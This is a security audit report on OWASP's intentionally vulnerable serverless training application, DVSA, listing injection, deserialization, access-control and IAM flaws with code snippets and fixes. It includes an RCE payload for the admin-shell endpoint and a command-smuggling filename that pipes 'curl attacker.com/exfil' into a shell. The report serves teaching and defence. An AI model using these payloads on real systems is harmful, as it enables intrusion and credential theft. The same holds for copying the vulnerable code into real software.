DVSA Security Audit Report

Damn Vulnerable Serverless Application - Security Assessment

Assessment Date: 2024
Application: OWASP DVSA (Damn Vulnerable Serverless Application)
Architecture: AWS Serverless (Lambda, API Gateway, DynamoDB, S3, Cognito)
Risk Rating: CRITICAL – Multiple exploitable vulnerabilities present

Executive Summary

DVSA is an intentionally vulnerable serverless application designed for security training. This audit identified 15+ critical or high-severity vulnerabilities exhibiting common serverless security anti-patterns. Key risks include remote code execution (RCE), command and code injection, insecure deserialization, and overprivileged IAM policies.

Critical Risk Areas:

Administrative backdoor with arbitrary code execution
Command injection via file upload and email processing
Insecure deserialization leading to RCE
SQL injection in inventory management
Privilege escalation vulnerabilities
Overly permissive IAM roles

Critical Vulnerabilities (CVSS 9.0–10.0)

1. Remote Code Execution (RCE) via eval() in Admin Shell [CVSS: 10.0]

Location: backend/functions/admin/admin_shell.js

Description:
A critical vulnerability allows arbitrary JavaScript code execution through eval() in the admin_shell.js Lambda. Admin users can execute any code on the Lambda runtime.

Vulnerable Code:

if (cmd) {
    try {
        eval(cmd);  // CRITICAL: Arbitrary code execution
        res = "ok";
    } catch (error) {
        console.error(error);
    }
}

Impact:

Complete compromise of Lambda execution environment
Access to AWS credentials and other sensitive environment variables
Pivot to other AWS resources via STS tokens
Data exfiltration from DynamoDB and S3

Exploitation Example:

POST /admin-shell
{
  "userId": "<admin_id>",
  "cmd": "require('child_process').execSync('cat /var/task/*').toString()"
}

Remediation:

Remove eval() completely; use only whitelisted operations
Implement strict input validation
Apply the principle of least privilege to Lambda execution roles

2. Command Injection in Feedback Upload Handler [CVSS: 9.8]

Location: backend/functions/processing/feedback_uploads.py

Description:
Uses os.system() with user-controlled filenames from S3 event notifications, allowing arbitrary command execution.

Vulnerable Code:

filename = parse.unquote_plus(event["Records"][0]["s3"]["object"]["key"])
os.system("touch /tmp/{} /tmp/{}.txt".format(filename, filename))  # COMMAND INJECTION

Impact:

Arbitrary command execution via malicious filenames (e.g., "; curl attacker.com/exfil | sh #)
Compromise of Lambda environment and AWS credentials

Remediation:

Never pass user input to shell commands
If shell execution is required, use Python’s subprocess with argument lists
Validate and sanitize all filenames

3. Insecure Deserialization via jsonpickle [CVSS: 9.8]

Location: backend/functions/admin/admin_update_orders.py

Description:
Uses jsonpickle.decode() on user-controlled input, enabling remote code execution through Python object deserialization.

Vulnerable Code:

unpickled = jsonpickle.decode(json.dumps(response["Item"], cls=DecimalEncoder))

Impact:

Remote code execution via crafted serialized payloads
Full server compromise

Remediation:

Replace jsonpickle with Python’s standard json module
Enforce cryptographic signatures for integrity if deserialization is essential

4. Code Injection in Admin Order Queries [CVSS: 9.1]

Location: backend/functions/admin/admin_get_orders.py

Description:
User input is concatenated into Python code and executed via eval() in the DynamoDB FilterExpression.

Vulnerable Code:

fe = "Attr('paymentTS').between(dateFrom, dateTo)"
orderId = "" if 'orderId' not in event else " & Attr('orderId').eq(event['orderId'])"
fe = fe + orderId + userId + status
response = table.scan(FilterExpression=eval(fe))  # CODE INJECTION

Impact:

Data exfiltration from DynamoDB tables
Denial of service via expensive queries

Remediation:

Use boto3’s Attr() methods directly without eval()
Implement parameterized queries in DynamoDB

5. SQL Injection in Receipt Generation [CVSS: 9.1]

Location: backend/functions/processing/create_receipt.py

Description:
SQLite queries built using string concatenation with user-controlled IDs.

Vulnerable Code:

res = cur.execute("SELECT itemId, name, price FROM inventory WHERE itemId = " + item_id + ";")

Impact:

Data exfiltration from inventory database
Potential database corruption

Remediation:

Use parameterized queries: cur.execute("SELECT ... WHERE itemId = ?", (item_id,))

6. Command Injection in Email Receipt Handler [CVSS: 9.1]

Location: backend/functions/processing/send_receipt_email.py

Description:
User-controlled date or metadata flows into os.system() through shell string formatting.

Vulnerable Code:

os.system(f'echo -e "\t----------------------\n\t\tDate: {date}" >> ' + download_path)

Impact:

Command execution via malicious date values or order metadata

Remediation:

Use Python file operations instead of shell commands: open(download_path, 'a').write(...)
Sanitize all input passed to shell commands

High Severity Vulnerabilities (CVSS 7.0–8.9)

7. Privilege Escalation via User Attribute Manipulation [CVSS: 8.8]

Location: backend/functions/user/user_create.py

Description:
Users can make themselves admins by supplying an Admin: true attribute during registration.

Vulnerable Code:

if "Admin" in event["request"]["userAttributes"] and event["request"]["userAttributes"]["Admin"] == True:
    isAdmin = True

Impact:

Unauthorized admin access
Ability to access admin functions, including RCE vectors

Remediation:

Never trust client-supplied attributes for admin decisions
Set admin status only through a secure backend process

8. IDOR in Order Retrieval [CVSS: 8.6]

Location: backend/functions/order/get_order.py

Description:
The isAdmin parameter is user-controlled, allowing any user to access any order by passing isAdmin: true.

Vulnerable Code:

is_admin = event.get("isAdmin", False)
if is_admin:
    response = table.query(KeyConditionExpression=Key('orderId').eq(orderId))

Impact:

Unauthorized access to other users’ orders and information

Remediation:

Determine admin status from JWT claims or database, not request parameters
Always verify ownership before revealing order details

9. Overly Permissive IAM Policies – DynamoDB Access on All Tables [CVSS: 8.5]

Location: template.yml

Description:
Multiple Lambda functions granted DynamoDB CRUD on '*' (all tables) rather than specific resources.

Affected Functions:

OrderCompleteFunction
CreateReceiptFunction
SendReceiptFunction

Vulnerable Configuration:

Policies:
  - DynamoDBCrudPolicy:
      TableName: '*'

Impact:

Access to all DynamoDB tables; cross-table data leakage

Remediation:

Specify explicit table names and utilize fine-grained permissions

10. Overly Permissive IAM Policies – S3 Full Access [CVSS: 8.5]

Location: template.yml

Description:
FeedbackUploadFunction has AmazonS3FullAccess and AWSLambda_FullAccess, SendReceiptFunction has S3CrudPolicy on all buckets.

Vulnerable Configuration:

FeedbackUploadFunction:
  Policies:
    - AWSLambda_FullAccess
    - AmazonS3FullAccess

SendReceiptFunction:
  Policies:
    - S3CrudPolicy:
        BucketName: '*'

Impact:

Access to all S3 buckets, potential data exfiltration, privilege escalation

Remediation:

Restrict S3 permissions to specific buckets or ARNs
Remove unnecessary broad Lambda permissions

11. Weak Authentication – Cognito Password Policy [CVSS: 7.5]

Location: template.yml

Description:
Cognito User Pool is configured with minimum 6-character passwords and no complexity requirements.

Vulnerable Configuration:

PasswordPolicy:
  RequireLowercase: false
  RequireSymbols: false
  RequireNumbers: false
  MinimumLength: 6
  RequireUppercase: false

Impact:

Susceptible to brute force and credential stuffing attacks

Remediation:

Enforce minimum 12-character passwords with complexity
Enable Cognito advanced security features

Medium Severity Vulnerabilities (CVSS 5.0–6.9)

12. Arbitrary File Read in Admin Shell [CVSS: 6.5]

Location: backend/functions/admin/admin_shell.js

Description:
Authenticated admin users can read arbitrary files on the Lambda's disk.

Vulnerable Code:

const filename = "/tmp/"+ body.file;
res = fs.readFileSync(filename, 'utf8');

Impact:

Disclosure of temp files, environment variables, and runtime artifacts

Remediation:

Strictly validate and normalize file paths; use allowlists

13. Server-Side Request Forgery (SSRF) in Admin Tweet [CVSS: 6.5]

Location: backend/functions/admin/admin_tweet.py

Description:
The Twitter API endpoint is constructed from user input with no validation, allowing internal requests (e.g., to AWS instance metadata).

Vulnerable Code:

action = event['api']
url = '{}{}'.format(twitter_api, action)
req = urllib2.Request(url, data=data, headers=auth_header)

Impact:

Potential access to AWS Instance Metadata Service by manipulating URL

Remediation:

Whitelist/sanitize api parameter; reject user-supplied hosts

14. Path Traversal in Admin Receipt Download [CVSS: 6.3]

Location: backend/functions/admin/admin_get_receipts.py

Description:
Unvalidated year/month/day parameters are used to construct S3 prefixes.

Vulnerable Code:

prefix = "{}/{}/{}".format(y, m, d)

Impact:

Access to files outside intended date ranges

Remediation:

Validate parameters with regex: ^[0-9]{4}$ for year and ^[0-9]{2}$ for month/day

15. CORS Misconfiguration [CVSS: 5.8]

Location: template.yml

Description:
API Gateway allows all origins (*).

Vulnerable Configuration:

Cors:
  AllowMethods: "'*'"
  AllowHeaders: "'*'"
  AllowOrigin: "'*'"

Impact:

Cross-origin attacks from the web; potential for CSRF

Remediation:

Whitelist explicit origins, headers, and methods

Additional Security Issues

16. Missing Authorization in Admin Inventory Management
Location: backend/functions/admin/admin_update_inventory.py
Any authenticated user can add, delete, or update inventory items due to missing authorization checks.
17. Information Disclosure in Error Messages
Various functions return error messages exposing stack traces, database structure, or internal details.
18. Insecure Direct Object Reference in User Profile Updates
Location: backend/functions/user/user_profile.py
User profile updates are not properly validated; users may modify other profiles.
19. Weak Admin Verification in Admin Shell
The isAdmin check in admin_shell.js relies only on DynamoDB, not JWT tokens, and can be bypassed if the userId is guessable.
20. Log Retention Manipulation
Location: backend/functions/cronjobs/cron_cleaner.py
The cron cleaner can modify CloudWatch logs retention, allowing attackers to delete or extend audit logs.

Infrastructure & Configuration Risks

IAM Policy Summary of Excessive Permissions:

Function	Excessive Permission	Risk
OrderCompleteFunction	DynamoDBCrudPolicy on '*'	Access to all DynamoDB tables
CreateReceiptFunction	DynamoDBCrudPolicy on '*'	Access to all DynamoDB tables
SendReceiptFunction	S3CrudPolicy on '*'	Access to all S3 buckets
SendReceiptFunction	DynamoDBCrudPolicy on '*'	Access to all DynamoDB tables
FeedbackUploadFunction	AWSLambda_FullAccess	Full Lambda management access
FeedbackUploadFunction	AmazonS3FullAccess	Full S3 access account-wide
OrderManagerFunction	CloudWatchLogsFullAccess	Full CloudWatch Logs access
OrderManagerFunction	AmazonCognitoPowerUser	User management privileges

Cognito Security Issues:

Weak Passwords: 6-character minimum, no complexity
No MFA: Multi-factor authentication not enforced
No Account Lockout: No brute-force protection
Explicit Auth Flows: ADMIN_NO_SRP_AUTH used instead of SRP

API Gateway Issues:

CORS allows all origins (*)
No rate limiting or throttling visible
No web application firewall (WAF)

Recommendations

Immediate Actions (Critical)

Remove or disable admin_shell.js – The eval() backdoor is an extreme risk
Replace os.system() calls with safe Python file operations
Remove jsonpickle; use standard json library
Fix IAM policies to use resource ARNs instead of wildcards

Short-term (High Priority)

Implement input validation with allowlists for all user data
Fix SQL injection in create_receipt.py using parameterized queries
Implement proper authorization – verify permissions based on JWTs, not request parameters
Strengthen Cognito password policy (12+ chars, mixed case, numbers, symbols)
Restrict CORS to explicit origins only

Long-term (Security Hardening)

Deploy AWS WAF configured for the OWASP Top 10
Enable CloudTrail for comprehensive audit logging
Implement VPC endpoints for private service communication
Enable DynamoDB encryption at rest and in transit
Adopt secrets management via AWS Secrets Manager or Parameter Store
Add security headers (HSTS, CSP, X-Frame-Options) to API Gateway responses

Compliance Considerations

This application violates several security standards:

OWASP Top 10: A01 (Broken Access Control), A03 (Injection), A07 (Authentication Failures), A09 (Security Logging Failures)
CIS AWS Foundations: IAM policies violate least privilege recommendations
PCI DSS: Payment data is stored without proper encryption or access controls
GDPR: Lacks proper access controls for personal data (PII)

Conclusion

DVSA contains intentional vulnerabilities for educational purposes only. If ever deployed with production credentials or customer data, it presents critical security risks. The combination of RCE, command injection, and excessive IAM privileges could easily result in a total AWS account compromise.

Risk Rating: CRITICAL – DO NOT DEPLOY IN PRODUCTION ENVIRONMENTS

Report generated by automated security analysis of the DVSA codebase.